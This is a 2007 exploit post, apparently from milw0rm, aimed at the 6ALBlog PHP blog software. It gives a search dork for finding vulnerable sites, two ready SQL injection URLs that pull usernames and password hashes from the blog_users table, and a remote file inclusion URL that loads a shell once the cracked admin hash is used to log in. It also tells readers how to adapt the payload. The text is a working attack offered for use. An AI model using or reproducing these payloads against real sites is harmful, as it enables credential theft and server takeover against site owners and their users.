+______________________________________________By Crackers_Child___________________________________________+
*
*
* [~] Portal.......: 6ALBlog All Versions
* [~] Download.....: http://down.otand.com/download/code/php/blog/6alblog.rar
* [~] Author.......: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com
* [~] Class........: Remote SQL Injection and Remote File Ä°nclude Vulnerability
* [~] Dork.........: inurl:"member.php?page=comments
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Exploit Sql...: http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/*
* http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/*
*
*
* [~] Exploit Rfi...: After Cracked md5 admin you must login site.com/admin/ than our rfi can work
*
* http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?
+_______________________________________________________________________________________________________________________+
[~] Ä°nfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone
and you can write it on exploit "MEMBERNAME" area ;)
+_______________________________________________________________________________________________________________________+
+_______________________________________________________________________________________________________________________+
*
*
* [~] Sp Tnx.......: str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends
*
+_______________________________________________________________________________________________________________________+
# milw0rm.com [2007-06-25]